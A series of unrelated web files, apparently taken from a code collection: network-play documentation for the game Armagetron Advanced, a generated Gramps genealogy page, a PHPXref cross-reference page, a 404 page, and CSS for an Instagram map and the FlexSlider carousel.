Send your fellow players messages by hitting the chat key configurable in the "Player Setup" menu
(defaults to "s"). Usually, the message will go out to all players. Servers from 0.2.8.0 on support
IRC style extensions: By starting your message with "/msg <playername>", you can send selected
players personal messages. With "/me", you can tell the others what you do; "/me falls asleep"
will print "Walruss walls asleep" if you're Walruss.
</p>
<p align=justify>
If another player annoys you, the silencing menu comes in handy: it can be reached by
pressing ESC, then selecting "Player Police/Silence Menu". If you're annoyed by chat in
general, edit <strong>settings.cfg</strong> and activate SILENCE_ALL. This has the effect that new
players get silenced by default and have to be unsilenced if you want to hear them.
</p>
<a name=><h4 align=left>Instant Chat</h4></a>
<p align=justify>
By default, the game lets you say some predefined things when you press F1 to F12 or 1 to
Backspace. Beware, the default settings for those can get you in trouble.
Change them in "Player Setup/Player 1 Settings/Instant Chat Setup",
and change the keybindings used in the player input configuration.
If you are already in chat mode and hit one of the instant chat keys not associated
with a printable character, like the F keys, the corresponding instant chat
will be inserted where you type. If an instant chat string ends in a backslash "\",
pressing the corresponding key will not send the string immediately, but will let you
append to it first.</p>
<a name=><h3 align=left>Ingame Admin</h3></a>
The server administrator can allow selected players to control the server settings through chat
commands; the setting <code>ADMIN_PASS</code> has to be modified to a nondefault value. Whoever knows
this value can log in by saying "/login <password>". After that, it's possible to issue regular
console commands by saying "/admin <command>" or to log out again with "/logout".
<br>
<strong>WARNING: currently, chat messages and therefore the password are sent unencrypted. This
means that everyone with physical access to the network flow, which is, among others, anyone
on the server's or the player's LAN, can steal the password.</strong>
<a name=><h3 align=left>Kicking and Banning</h3></a>
<p align=justify>
You can kick players with the <code>KICK user</code> command; it accepts either the network user ID or
the user name (currently the nickname, filtered so you can actually type it)
of the player to kick; you can get a list of both with the command <code>PLAYERS</code>. You can
ban them from the server with <code>BAN user</code> or <code>BAN user time</code>; the time duration is given
in minutes and defaults to 60 minutes if not present. The <code>user</code> argument of <code>BAN</code> is
interpreted exactly as with <code>KICK</code>.
</p>
<p align=justify>
You can get a list of currently banned IP addresses with <code>BAN_LIST</code>. To unban one of these,
use <code>UNBAN_IP ip</code>. To ban an IP address explicitly, use <code>BAN_IP ip</code>. Bans are persistent
when you shut down and restart the server; the data is stored in <strong>var/bans.txt</strong> as
IP/duration in seconds pairs.
</p>
<a name=><h4 align=left>Autobanning</h4></a>
<p align=justify>
When a user gets kicked often (by you or by kick votes), he will be banned automatically. It is
measured how often a user gets kicked per hour (KPH); this value is not persistent across
runs of the server. KPH can't get larger than <code>NETWORK_AUTOBAN_MAX_KPH</code>. When a user
gets kicked, the duration of the automatic ban in minutes is determined as
(KPH - <code>NETWORK_AUTOBAN_OFFSET</code>) * <code>NETWORK_AUTOBAN_FACTOR</code>; the user is not banned if this value
is negative. You can disable automatic banning by setting <code>NETWORK_AUTOBAN_OFFSET</code> larger than
<code>NETWORK_AUTOBAN_MAX_KPH</code>.
</p>
<a name=><h3 align=left>Voting</h3></a>
Sometimes, votes on important topics will be cast by players. If a vote is pending, a menu
will automatically pop up between rounds and remind you to vote. You can accept or reject
a suggestion, or explicitly say you don't care about it.
<br>
The only thing possible to vote on are player kicks. To start a kick vote, press ESC and enter
the "Player Police/Kick Menu" menu and select the player you want kicked. Prepare to get kicked
yourself if you abuse the system.
<a name=><h3 align=left>Synchronization Settings</h3></a>
<p align=justify>
The two <code>CYCLE_SYNC_INTERVAL_</code> settings determine the interval at which sync commands are sent
for cycles. <code>CYCLE_SYNC_INTERVAL_SELF</code> determines the time between syncs to the owner of
a cycle itself, and <code>CYCLE_SYNC_INTERVAL_ENEMY</code> determines the interval for everyone else.
</p>
New clients since 0.2.7.1 send the time of turn commands to the server.
This makes it possible to avoid grinding lag sliding
(you move towards a wall, grind it shortly and turn away again, and you'll slide)
by letting the cycle on the server turn not before the time sent by the client.
At the low speeds before the grind, the positional command interpretion
is inaccurate and will usually turn the cycle too early.
Now, old clients don't send the command time, so this code can't work. The lag sliding is a clear disadvantage, but the earlier turn is an advantage in some situations because it makes you cover more ground, so both the new and the old players have plenty of reason to complain if they are not treated equally. Therefore, when CYCLE_FAIR_ANTILAG is set to 1 and old clients are present, this code is deactivated.
When a cycle turns in free space, the server will try to follow the client's request by matching the turn position as closely as possible. Sometimes however there are large desyncs and clients sent silly turns halfway across the grid from their current position. So, for clients that send the command time, the server will execute turns only in a time window around that command time. The width of that window is determined by CYCLE_TIME_TOLERANCE.
I observed that old clients ( 0.2.7.0 and earlier ) would be more likely to pass through walls when they received a sync from the server shortly before. So, if you set CYCLE_AVOID_OLDCLIENT_BAD_SYNC to 1, the server will not send those syncs. Whether this helps or makes matters worse by not sending enough syncs is unknown, that's why it is a setting.
<a name=><h2 align=left>Technical details</h2></a>
<p align=justify>
You are not limited to one player per computer;
on each of them you can play with up to four people. In the
precompiled version, there is a limit of 16 clients.
You can set the configuration variable <code>MAX_CLIENTS</code> to limit it further.
If you compile your Armagetron Advanced server yourself,
you can increase the limit if you configure it with
<pre>
CXXFLAGS="-DMAXCLIENTS=X" ./configure
</pre>
where X is the number of clients you want to support.
</p>
<p align=justify>
If you are behind a masquerading firewall (such as a DSL router or the Microsoft connection sharing),
you cannot act as a server; your computer is then unreachable from the outside unless
you manage to forward port 4534 UDP connections from the firewall to your server.
Most software solutions and some standalone DSL routers offer this option, so you may be lucky.
</p>
<p align=justify>
The client may be behind a firewall as long as it allows outgoing UDP connections
on the Armagetron Advanced port.
</p>
<a name=dedicated><h2 align=left>The dedicated server</h2></a>
<p align=justify>
Following the model of Quake 1-3, there is a special binary version of
the game available for download (or compile it yourself giving the
option <strong>--disable-glout</strong> to configure) that has all input/output
features disabled. If you start it, it will read the normal configuration files and
set up a network game according to the settings in
the game menu (Number of AI players, game mode and finish mode).
A dedicated server takes input from the keyboard and interprets
it just the way it does with the
<a href="config.html#files">configuration files</a>.
Additionally to the usual configuration files, the dedicated server
will read the file <strong>everytime.cfg</strong> from the <strong>var</strong> directory
before each round; it may be comfortable to place quickly changing
settings there. You can join the game on the dedicated server just the way
described <a href=#np>above</a>.
</p>
<p align=justify>
The advantages of this solution are:
<ul>
<li>there is no longer a "privileged" player; all players are clients
to the dedicated server.</li>
<li>
the dedicated server can use it's full computing power just to
manage the game; it does not have to bother about input or 3d rendering.
So, the game is a bit smoother for all players.
</li>
<li>
the dedicated server should run on any 32 Bit Windows and about any UNIX;
it does not need any special library installed (OpenGL, SDL, ...) , so
it is easy to set up public internet servers.
</li>
<li>
The dedicated server uses less CPU power than a client because
it does not have to care about graphics and sound. It can be run on an older PC.
</li>
</ul>
</p>
<a name=><h3 align=left>Controlling network input</h3></a>
<p align=justify>Often, it is
desireable to not only specify the port Armagetron Advanced listens on, but also the IP address.
Examples include LAN servers that run on a machine with connection to the internet or
servers on a server farm where each host is shared between many users and has a multitude
of IP addresses. For this purpose, the <code>SERVER_IP</code> setting has been introduced. Documentation
with example usage is provided in <strong>settings_dedicated.cfg</strong>.
</p>
<a name=><h2 align=left>Ping Charity</h2></a>
<p align=justify>
Ping charity can be configured along with your network bandwidth and other settings
in the "Network Setup" submenu in the "Network Game" menu.
</p>
<p align=justify>
It is the configurable part of the "equal ping" technology. In short,
if you have low ping and your opponent has high ping (ping: the time
it takes a message to travel from your computer to the server and
back, usually measured in milliseconds), you can take over some of his
ping to make the situation more equal.
So, if you have ping 60, your
opponent has ping 160 and you set the ping charity to at least 50
(more does not change the situation), you will take over 50 ms of
his ping, giving you both ping 110. If you set your ping charity to
20, you will end up with ping 80, your opponent with ping 140. Of
course, you may be greedy and set ping charity to zero, but
I suggest leaving it at the default value 100.
</p>
<p align=justify>
How does that "equal ping" thing work? It is not that complicated, but
for now, I rather keep the secret buried in the source code (too lazy
to explain it right now...).
</p>
<a name=><h2 align=left>Spectator Mode</h2></a>
<p align=justify>
In the player menu, there is the "Spectator mode" toggle; If you just
want to watch an internet game, connect to the server with spectator
mode enabled. Note that you will be almost completely ignored in
spectator mode: the other players won't know you are there at all,
you can't chat and the dedicated server will not bother to start
a game if only spectators are online (all you are going to get is
a black screen). Only the server administrator will get a message
that a client connected.
</p>
<p align=justify>
Please note that this feature is unsupported; future servers may not allow
spectating in this way.
</p>
<a name=><h2 align=left>Scores</h2></a>
<p align=justify>
In a multiplayer game, every crucial action makes you gain or lose
points; after
<ul>
<li>a fixed number of rounds has been played</li>
<li>a fixed time elapsed or</li>
<li>a fixed score is reached</li>
</ul>
the team with the most points wins the match. If two or more
teams share the first place, the fight continues until there is
a unique winner.
<br>
You can configure the score/time/rounds-limits in the file
<strong>settings.cfg</strong>; scores and winners are logged in the file
<strong>scorelog.txt</strong> on the server.
</p>
<p align=justify>
If you are the only person on a dedicated server, a special
single player game is started (its parameters are determined in
the <a href="config.html#sphh" target=_top>SP_* variables</a>
in <strong>settings.txt</strong> on the server) to keep
you busy until someone else connects; the highscores in
this mode may be published by the server administrator.
<br>
The highest scores collected in a single player game are collected
in the file <strong>highscores.txt</strong>, the people with the most won multiplayer
rounds/matches are stored in <strong>won_rounds.txt</strong> and <strong>won_matches.txt</strong>.
A ladder is stored in <strong>ladder.txt</strong>.
<br>
Note: these statistics have all not been adapted to team play and most of them
will store very odd results.
</p>
<a name=bb><a name=><h2 align=left>BIG BROTHER</h2></a></a>
<p align=justify>
As in any software downloaded for free, you can't be completely
sure whether Armagetron Advanced has secret functions that, for example,
spy on your system internals, exploit known Windows bugs to
get to your ISP's password, etc... and send this information
to the author. Of course, Armagetron Advanced does not do such a thing,
and you can check that in the source code.
<br>
But Armagetron Advanced DOES send some information out: If you connect
to the master server for the first time, Armagetron Advanced will send
<br>
<ul>
<li>Your Operating system and Armagetron Advanced/SDL version</li>
<li>the information the OpenGL system offers, telling me which
graphic card you use</li>
<li>if you are running Armagetron Advanced fullscreen or windowed</li>
</ul>
and nothing else, especially no personal information. I hope
you understand that there is a good reason to collect this information.
If you don't want to reveal these facts, simply edit
your armagetronad(-dedicated) configuration file <strong>user.cfg</strong>
and change
<br>
<code>BIG_BROTHER 1</code>
<br>
to
<br>
<code>BIG_BROTHER 0</code>
<br>
</p>
<a name=><h2 align=left>Internals</h2></a>
<p align=justify>
If you are interested in network programming yourself, you may want to
read the <a href=net/index.html>network subsystem documentation</a>.
</p>
<br>
<p align=center>This document was created by
<a href="http://armagetron.sf.net/contact.html" target=_top><strong>Manuel Moos</strong></a>
</p>
<p align=center>
Last modification: Jan 29 2015
</p>
<p align=center><!--#spaceportsbanner--></p>
<table width="90%" align=center>
<tr>
<td align=center width="15%">
<a href="index.html" target="_top">First Start</a>
</td>
<td align=center width="15%">
<a href="install_windows.html" target="_top">Windows Installation</a>
</td>
<td align=center width="15%">
<a href="install_macosx.html" target="_top">Mac OS X Installation</a>
</td>
<td align=center width="15%">
<a href="install_linux.html" target="_top">Linux Installation</a>
</td>
<td align=center width="15%">
<strong>Network Play</strong>
</td>
<td align=center width="15%">
<a href="config.html" target="_top">Configuration</a>
</td>
<td align=center width="10%">
<a href="faq.html" target="_top">FAQ</a>
</td>
<td align=center width="15%">
<a href="compile.html" target="_top">Redistribution</a>
</td>
</tr>
</table>
</body>
</html>
|
gramps42/gramps/example_NAVWEB0/ppl/d/n/KGVJQCYKDEYEJRAOND.html | belissent/testing-example-reports | <!DOCTYPE html>
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head lang="en-US">
<title>My Family Tree - Todd, John</title>
<meta charset="UTF-8" />
<meta name ="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1" />
<meta name ="apple-mobile-web-app-capable" content="yes" />
<meta name="generator" content="Gramps 4.2.2 http://gramps-project.org/" />
<meta name="author" content="" />
<link href="../../../images/favicon2.ico" rel="shortcut icon" type="image/x-icon" />
<link href="../../../css/narrative-screen.css" media="screen" rel="stylesheet" type="text/css" />
<link href="../../../css/narrative-print.css" media="print" rel="stylesheet" type="text/css" />
<link href="../../../css/ancestortree.css" media="screen" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="header">
<h1 id="SiteTitle">My Family Tree</h1>
</div>
<div class="wrapper" id="nav" role="navigation">
<div class="container">
<ul class="menu" id="dropmenu">
<li class = "CurrentSection"><a href="../../../individuals.html" title="Individuals">Individuals</a></li>
<li><a href="../../../index.html" title="Surnames">Surnames</a></li>
<li><a href="../../../places.html" title="Places">Places</a></li>
<li><a href="../../../sources.html" title="Sources">Sources</a></li>
<li><a href="../../../media.html" title="Media">Media</a></li>
<li><a href="../../../thumbnails.html" title="Thumbnails">Thumbnails</a></li>
</ul>
</div>
</div>
<div class="content" id="IndividualDetail">
<h3>Todd, John<sup><small> <a href="#sref1">1</a></small></sup></h3>
<div id="summaryarea">
<table class="infolist">
<tr>
<td class="ColumnAttribute">Birth Name</td>
<td class="ColumnValue">
Todd, John
</td>
</tr>
<tr>
<td class="ColumnAttribute">Gramps ID</td>
<td class="ColumnValue">I0079</td>
</tr>
<tr>
<td class="ColumnAttribute">Gender</td>
<td class="ColumnValue">male</td>
</tr>
<tr>
<td class="ColumnAttribute">Age at Death</td>
<td class="ColumnValue">unknown</td>
</tr>
</table>
</div>
<div class="subsection" id="events">
<h4>Events</h4>
<table class="infolist eventlist">
<thead>
<tr>
<th class="ColumnEvent">Event</th>
<th class="ColumnDate">Date</th>
<th class="ColumnPlace">Place</th>
<th class="ColumnDescription">Description</th>
<th class="ColumnNotes">Notes</th>
<th class="ColumnSources">Sources</th>
</tr>
</thead>
<tbody>
<tr>
<td class="ColumnEvent">
Birth
</td>
<td class="ColumnDate">1765-11-26</td>
<td class="ColumnPlace">
<a href="../../../plc/b/n/TGVJQCRFKHZESR6WNB.html" title="Shelton, WA, USA">
Shelton, WA, USA
</a>
</td>
<td class="ColumnDescription">
Birth of Todd, John
</td>
<td class="ColumnNotes">
<div>
</div>
</td>
<td class="ColumnSources">
</td>
</tr>
<tr>
<td class="ColumnEvent">
Death
</td>
<td class="ColumnDate"> </td>
<td class="ColumnPlace">
<a href="../../../plc/p/8/Y2VJQCSM0KH3LI5F8P.html" title="Clearlake, Lake, CA, USA">
Clearlake, Lake, CA, USA
</a>
</td>
<td class="ColumnDescription">
Death of Todd, John
</td>
<td class="ColumnNotes">
<div>
</div>
</td>
<td class="ColumnSources">
</td>
</tr>
</tbody>
</table>
</div>
<div class="subsection" id="parents">
<h4>Parents</h4>
<table class="infolist">
<thead>
<tr>
<th class="ColumnAttribute">Relation to main person</th>
<th class="ColumnValue">Name</th>
<th class="ColumnValue">Relation within this family (if not by birth)</th>
</tr>
</thead>
<tbody>
</tbody>
<tr>
<td class="ColumnAttribute">Father</td>
<td class="ColumnValue">
<a href="../../../ppl/g/8/DFVJQCIZ2L12CIU88G.html">Todd, Charles<span class="grampsid"> [I0077]</span></a>
</td>
</tr>
<tr>
<td class="ColumnAttribute">Mother</td>
<td class="ColumnValue">
<a href="../../../ppl/y/d/4GVJQCO4554TRPU8DY.html">Cole, Eurydice<span class="grampsid"> [I0078]</span></a>
</td>
</tr>
<tr>
<td class="ColumnAttribute"> </td>
<td class="ColumnValue"> <a href="../../../ppl/d/n/KGVJQCYKDEYEJRAOND.html">Todd, John<span class="grampsid"> [I0079]</span></a></td>
<td class="ColumnValue"></td>
</tr>
</table>
</div>
<div class="subsection" id="families">
<h4>Families</h4>
<table class="infolist">
<tr class="BeginFamily">
<td class="ColumnType"> </td>
<td class="ColumnAttribute"> </td>
<td class="ColumnValue"><a href="" title="Family of Todd, John and Лалетин, Elizabeth">Family of Todd, John and Лалетин, Elizabeth<span class="grampsid"> [F0152]</span></a></td>
</tr>
<tr class="BeginFamily">
<td class="ColumnType">Married</td>
<td class="ColumnAttribute">Wife</td>
<td class="ColumnValue">
<a href="../../../ppl/1/5/BHVJQCYNVES2ZING51.html">Лалетин, Elizabeth<span class="grampsid"> [I0080]</span></a>
</td>
</tr>
<tr>
<td class="ColumnType"> </td>
<td class="ColumnAttribute"> </td>
<td class="ColumnValue">
<table class="infolist eventlist">
<thead>
<tr>
<th class="ColumnEvent">Event</th>
<th class="ColumnDate">Date</th>
<th class="ColumnPlace">Place</th>
<th class="ColumnDescription">Description</th>
<th class="ColumnNotes">Notes</th>
<th class="ColumnSources">Sources</th>
</tr>
</thead>
<tbody>
<tr>
<td class="ColumnEvent">
Marriage
</td>
<td class="ColumnDate"> </td>
<td class="ColumnPlace"> </td>
<td class="ColumnDescription">
Marriage of Todd, John and Лалетин, Elizabeth
</td>
<td class="ColumnNotes">
<div>
</div>
</td>
<td class="ColumnSources">
</td>
</tr>
</tbody>
</table>
</td>
<tr>
<td class="ColumnType"> </td>
<td class="ColumnAttribute">Children</td>
<td class="ColumnValue">
<ol>
<li>
<a href="../../../ppl/5/o/PHVJQC4A6OZLGHEOO5.html">Todd, William<span class="grampsid"> [I0081]</span></a>
</li>
</ol>
</td>
</tr>
</tr>
</table>
</div>
<div class="subsection" id="pedigree">
<h4>Pedigree</h4>
<ol class="pedigreegen">
<li>
<a href="../../../ppl/g/8/DFVJQCIZ2L12CIU88G.html">Todd, Charles<span class="grampsid"> [I0077]</span></a>
<ol>
<li class="spouse">
<a href="../../../ppl/y/d/4GVJQCO4554TRPU8DY.html">Cole, Eurydice<span class="grampsid"> [I0078]</span></a>
<ol>
<li class="thisperson">
Todd, John
<ol class="spouselist">
<li class="spouse">
<a href="../../../ppl/1/5/BHVJQCYNVES2ZING51.html">Лалетин, Elizabeth<span class="grampsid"> [I0080]</span></a>
<ol>
<li>
<a href="../../../ppl/5/o/PHVJQC4A6OZLGHEOO5.html">Todd, William<span class="grampsid"> [I0081]</span></a>
</li>
</ol>
</li>
</ol>
</li>
</ol>
</li>
</ol>
</li>
</ol>
</div>
<div class="subsection" id="tree">
<h4>Ancestors</h4>
<div id="treeContainer" style="width:735px; height:602px;">
<div class="boxbg male AncCol0" style="top: 269px; left: 6px;">
<a class="noThumb" href="../../../ppl/d/n/KGVJQCYKDEYEJRAOND.html">
Todd, John
</a>
</div>
<div class="shadow" style="top: 274px; left: 10px;"></div>
<div class="bvline" style="top: 301px; left: 165px; width: 15px"></div>
<div class="gvline" style="top: 306px; left: 165px; width: 20px"></div>
<div class="boxbg male AncCol1" style="top: 119px; left: 196px;">
<a class="noThumb" href="../../../ppl/g/8/DFVJQCIZ2L12CIU88G.html">
Todd, Charles
</a>
</div>
<div class="shadow" style="top: 124px; left: 200px;"></div>
<div class="bvline" style="top: 151px; left: 180px; width: 15px;"></div>
<div class="gvline" style="top: 156px; left: 185px; width: 20px;"></div>
<div class="bhline" style="top: 151px; left: 180px; height: 150px;"></div>
<div class="gvline" style="top: 156px; left: 185px; height: 150px;"></div>
<div class="boxbg female AncCol1" style="top: 419px; left: 196px;">
<a class="noThumb" href="../../../ppl/y/d/4GVJQCO4554TRPU8DY.html">
Cole, Eurydice
</a>
</div>
<div class="shadow" style="top: 424px; left: 200px;"></div>
<div class="bvline" style="top: 451px; left: 180px; width: 15px;"></div>
<div class="gvline" style="top: 456px; left: 185px; width: 20px;"></div>
<div class="bhline" style="top: 301px; left: 180px; height: 150px;"></div>
<div class="gvline" style="top: 306px; left: 185px; height: 150px;"></div>
</div>
</div>
<div class="subsection" id="sourcerefs">
<h4>Source References</h4>
<ol>
<li>
<a href="../../../src/x/a/X5TJQC9JXU4RKT6VAX.html" title="Import from test2.ged" name ="sref1">
Import from test2.ged
<span class="grampsid"> [S0003]</span>
</a>
</li>
</ol>
</div>
</div>
<div class="fullclear"></div>
<div id="footer">
<p id="createdate">
Generated by <a href="http://gramps-project.org/">Gramps</a> 4.2.2 on 2015-12-25<br />Last change was the 2007-07-26 08:34:25
</p>
<p id="copyright">
</p>
</div>
</body>
</html>
|
wp-content/themes/arteforadomuseu/inc/instagram/css/instagram.css | frentedeesquerdace2014/xr3 | .instagram-page {
position: absolute;
top: 120px;
bottom: 60px;
left: 0;
right: 0;
}
.instagram-header {
position: relative;
z-index: 2;
margin-top: 30px;
pointer-events: none;
}
.instagram-header h2 {
color: #fff;
z-index: 3;
text-transform: uppercase;
font-size: 20px;
text-shadow: 1px 1px 1px rgba(0,0,0,0.5);
width: 200px;
line-height: 22px;
float: left;
}
.instagram-header h2:before {
content: url(../marker_big.png);
display: block;
margin-bottom: 20px;
}
.instagram-header .description {
float: right;
margin: 20px 0;
color: #f0f0f0;
width: 300px;
background: rgba(0,0,0,0.5);
font-weight: 200;
font-size: 16px;
line-height: 24px;
padding: 20px;
}
#instagram_map {
position: absolute;
top: 0;
left: 0;
bottom: 0;
right: 0;
}
#instagram_map .leaflet-popup-content img {
display: block;
width: 150px;
height: 150px;
margin: 0;
}
#instagram_map .leaflet-popup-content p {
margin: 0;
}
#instagram_map .leaflet-popup-content .author {
display: block;
font-weight: 800;
} |
_variables/user_root_path.html | mgsolipa/b2evolution_phpxref | <!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<title>PHPXRef 0.7.1 : Unnamed Project : Variable Reference: $user_root_path</title>
<link rel="stylesheet" href="../sample.css" type="text/css">
<link rel="stylesheet" href="../sample-print.css" type="text/css" media="print">
<style id="hilight" type="text/css"></style>
<meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
</head>
<body bgcolor="#ffffff" text="#000000" link="#801800" vlink="#300540" alink="#ffffff">
<table class="pagetitle" width="100%">
<tr>
<td valign="top" class="pagetitle">
[ <a href="../index.html">Index</a> ]
</td>
<td align="right" class="pagetitle">
<h2 style="margin-bottom: 0px">PHP Cross Reference of Unnamed Project</h2>
</td>
</tr>
</table>
<!-- Generated by PHPXref 0.7.1 at Sat Nov 21 22:13:19 2015 -->
<!-- PHPXref (c) 2000-2010 Gareth Watts - gareth@omnipotent.net -->
<!-- http://phpxref.sourceforge.net/ -->
<script src="../phpxref.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript">
<!--
ext='.html';
relbase='../';
subdir='_variables';
filename='index.html';
cookiekey='phpxref';
handleNavFrame(relbase, subdir, filename);
logVariable('user_root_path');
// -->
</script>
<script language="JavaScript" type="text/javascript">
if (gwGetCookie('xrefnav')=='off')
document.write('<p class="navlinks">[ <a href="javascript:navOn()">Show Explorer<\/a> ]<\/p>');
else
document.write('<p class="navlinks">[ <a href="javascript:navOff()">Hide Explorer<\/a> ]<\/p>');
</script>
<noscript>
<p class="navlinks">
[ <a href="../nav.html" target="_top">Show Explorer</a> ]
[ <a href="index.html" target="_top">Hide Navbar</a> ]
</p>
</noscript>
[<a href="../index.html">Top level directory</a>]<br>
<script language="JavaScript" type="text/javascript">
<!--
document.writeln('<table align="right" class="searchbox-link"><tr><td><a class="searchbox-link" href="javascript:void(0)" onMouseOver="showSearchBox()">Search</a><br>');
document.writeln('<table border="0" cellspacing="0" cellpadding="0" class="searchbox" id="searchbox">');
document.writeln('<tr><td class="searchbox-title">');
document.writeln('<a class="searchbox-title" href="javascript:showSearchPopup()">Search History +</a>');
document.writeln('<\/td><\/tr>');
document.writeln('<tr><td class="searchbox-body" id="searchbox-body">');
document.writeln('<form name="search" style="margin:0px; padding:0px" onSubmit=\'return jump()\'>');
document.writeln('<a class="searchbox-body" href="../_classes/index.html">Class<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="classname"><br>');
document.writeln('<a id="funcsearchlink" class="searchbox-body" href="../_functions/index.html">Function<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="funcname"><br>');
document.writeln('<a class="searchbox-body" href="../_variables/index.html">Variable<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="varname"><br>');
document.writeln('<a class="searchbox-body" href="../_constants/index.html">Constant<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="constname"><br>');
document.writeln('<a class="searchbox-body" href="../_tables/index.html">Table<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="tablename"><br>');
document.writeln('<input type="submit" class="searchbox-button" value="Search">');
document.writeln('<\/form>');
document.writeln('<\/td><\/tr><\/table>');
document.writeln('<\/td><\/tr><\/table>');
// -->
</script>
<div id="search-popup" class="searchpopup"><p id="searchpopup-title" class="searchpopup-title">title</p><div id="searchpopup-body" class="searchpopup-body">Body</div><p class="searchpopup-close"><a href="javascript:gwCloseActive()">[close]</a></p></div>
<h3>Variable Cross Reference</h3>
<h2><a href="index.html#user_root_path">$user_root_path</a></h2>
<b>Defined at:</b><ul>
<li><a href="../inc/users/model/_user.class.php.html">/inc/users/model/_user.class.php</A> -> <a href="../inc/users/model/_user.class.php.source.html#l4386"> line 4386</A></li>
<li><a href="../inc/users/model/_user.class.php.html">/inc/users/model/_user.class.php</A> -> <a href="../inc/users/model/_user.class.php.source.html#l4393"> line 4393</A></li>
</ul>
<br><b>Referenced 5 times:</b><ul>
<li><a href="../inc/users/model/_user.class.php.html">/inc/users/model/_user.class.php</a> -> <a href="../inc/users/model/_user.class.php.source.html#l4386"> line 4386</a></li>
<li><a href="../inc/users/model/_user.class.php.html">/inc/users/model/_user.class.php</a> -> <a href="../inc/users/model/_user.class.php.source.html#l4393"> line 4393</a></li>
<li><a href="../inc/users/model/_user.class.php.html">/inc/users/model/_user.class.php</a> -> <a href="../inc/users/model/_user.class.php.source.html#l4424"> line 4424</a></li>
<li><a href="../inc/users/model/_user.class.php.html">/inc/users/model/_user.class.php</a> -> <a href="../inc/users/model/_user.class.php.source.html#l4425"> line 4425</a></li>
<li><a href="../inc/users/model/_user.class.php.html">/inc/users/model/_user.class.php</a> -> <a href="../inc/users/model/_user.class.php.source.html#l4430"> line 4430</a></li>
</ul>
<!-- A link to the phpxref site in your customized footer file is appreciated ;-) -->
<br><hr>
<table width="100%">
<tr><td>Generated: Sat Nov 21 22:13:19 2015</td>
<td align="right"><i>Cross-referenced by <a href="http://phpxref.sourceforge.net/">PHPXref 0.7.1</a></i></td>
</tr>
</table>
</body></html>
|
public/404.html | beastaugh/papertrail | <!DOCTYPE HTML>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>The page you were looking for doesn’t exist</title>
<link href="/stylesheets/style.css" media="screen,projection" rel="stylesheet" type="text/css" />
</head><body><div id="wrapper">
<div id="header">
<p id="title"><a href="/" rel="home">Books on Extralogical</a></p>
</div>
<div id="content">
<h1>The page you were looking for doesn’t exist.</h1>
<p>You may have mistyped the address or the page may have moved.</p>
</div>
</div></body></html> |
sites/all/themes/radix/flexslider/flexslider.css | gerrit1978/Radix-Recruitment-Site | /*
* jQuery FlexSlider v2.2.0
* http://www.woothemes.com/flexslider/
*
* Copyright 2012 WooThemes
* Free to use under the GPLv2 license.
* http://www.gnu.org/licenses/gpl-2.0.html
*
* Contributing author: Tyler Smith (@mbmufffin)
*/
/* Browser Resets
*********************************/
.flex-container a:active,
.flexslider a:active,
.flex-container a:focus,
.flexslider a:focus {outline: none;}
.slides,
.flex-control-nav,
.flex-direction-nav {margin: 0; padding: 0; list-style: none;}
/* FlexSlider Necessary Styles
*********************************/
.flexslider {margin: 0; padding: 0;}
.flexslider .slides > li {display: none; -webkit-backface-visibility: hidden;} /* Hide the slides before the JS is loaded. Avoids image jumping */
.flexslider .slides img {width: 100%; display: block;}
.flex-pauseplay span {text-transform: capitalize;}
/* Clearfix for the .slides element */
.slides:after {content: "\0020"; display: block; clear: both; visibility: hidden; line-height: 0; height: 0;}
html[xmlns] .slides {display: block;}
* html .slides {height: 1%;}
/* No JavaScript Fallback */
/* If you are not using another script, such as Modernizr, make sure you
* include js that eliminates this class on page load */
.no-js .slides > li:first-child {display: block;}
/* FlexSlider Default Theme
*********************************/
.flexslider { margin: 0 0 60px; background: #fff; border: 4px solid #fff; position: relative; -webkit-border-radius: 4px; -moz-border-radius: 4px; -o-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: 0 1px 4px rgba(0,0,0,.2); -moz-box-shadow: 0 1px 4px rgba(0,0,0,.2); -o-box-shadow: 0 1px 4px rgba(0,0,0,.2); box-shadow: 0 1px 4px rgba(0,0,0,.2); zoom: 1; }
.flex-viewport { max-height: 2000px; -webkit-transition: all 1s ease; -moz-transition: all 1s ease; -o-transition: all 1s ease; transition: all 1s ease; }
.loading .flex-viewport { max-height: 300px; }
.flexslider .slides { zoom: 1; }
.carousel li { margin-right: 5px; }
/* Direction Nav */
/*
.flex-direction-nav {*height: 0;}
.flex-direction-nav a { display: block; width: 40px; height: 40px; margin: -20px 0 0; position: absolute; top: 50%; z-index: 10; overflow: hidden; opacity: 0; cursor: pointer; color: rgba(0,0,0,0.8); text-shadow: 1px 1px 0 rgba(255,255,255,0.3); -webkit-transition: all .3s ease; -moz-transition: all .3s ease; transition: all .3s ease; }
*/
/*
.flex-direction-nav .flex-prev { left: -50px; }
.flex-direction-nav .flex-next { right: -50px; text-align: right; }
.flexslider:hover .flex-prev { opacity: 0.7; left: 10px; }
.flexslider:hover .flex-next { opacity: 0.7; right: 10px; }
.flexslider:hover .flex-next:hover, .flexslider:hover .flex-prev:hover { opacity: 1; }
.flex-direction-nav .flex-disabled { opacity: 0!important; filter:alpha(opacity=0); cursor: default; }
*/
/*
.flex-direction-nav a:before { font-family: "flexslider-icon"; font-size: 40px; display: inline-block; content: '\f001'; }
.flex-direction-nav a.flex-next:before { content: '\f002'; }
*/
/* Pause/Play */
.flex-pauseplay a { display: block; width: 20px; height: 20px; position: absolute; bottom: 5px; left: 10px; opacity: 0.8; z-index: 10; overflow: hidden; cursor: pointer; color: #000; }
.flex-pauseplay a:before { font-family: "flexslider-icon"; font-size: 20px; display: inline-block; content: '\f004'; }
.flex-pauseplay a:hover { opacity: 1; }
.flex-pauseplay a.flex-play:before { content: '\f003'; }
/* Control Nav */
.flex-control-nav {width: 100%; position: absolute; bottom: -40px; text-align: center;}
.flex-control-nav li {margin: 0 6px; display: inline-block; zoom: 1; *display: inline;}
